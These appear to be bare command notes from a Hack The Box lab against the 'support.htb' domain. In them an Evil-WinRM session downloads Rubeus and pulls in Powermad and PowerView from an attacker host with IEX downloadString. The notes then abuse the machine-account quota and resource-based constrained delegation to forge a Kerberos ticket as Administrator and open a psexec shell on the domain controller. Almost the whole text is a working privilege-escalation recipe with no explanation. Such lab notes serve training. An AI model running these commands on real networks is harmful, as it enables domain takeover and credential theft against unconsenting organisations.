*Evil-WinRM* PS C:\Users\support\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> curl 10.10.14.3/Rubeus.exe -o Rubeus.exe
*Evil-WinRM* PS C:\programdata> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/Powermad.ps1')
*Evil-WinRM* PS C:\programdata> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/PowerView.ps1')
Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota
10 machines can be created
New-MachineAccount -MachineAccount Adot8Machine -Password $(ConvertTo-SecureString 'adot8' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer Adot8Machine -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer Adot8Machine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
.\Rubeus.exe hash /password:adot8
.\Rubeus.exe s4u /user:Adot8Machine$ /rc4:872E7BD85E304E2AF28DFE1BDAF25D8B /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /ptt
Paste contents into ticket.kirbi.b64 and remove spaces
base64 -d ticket.kirbi.b64 > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
impacket-psexec -k -no-pass support.htb/administrator@DC.SUPPORT.HTB
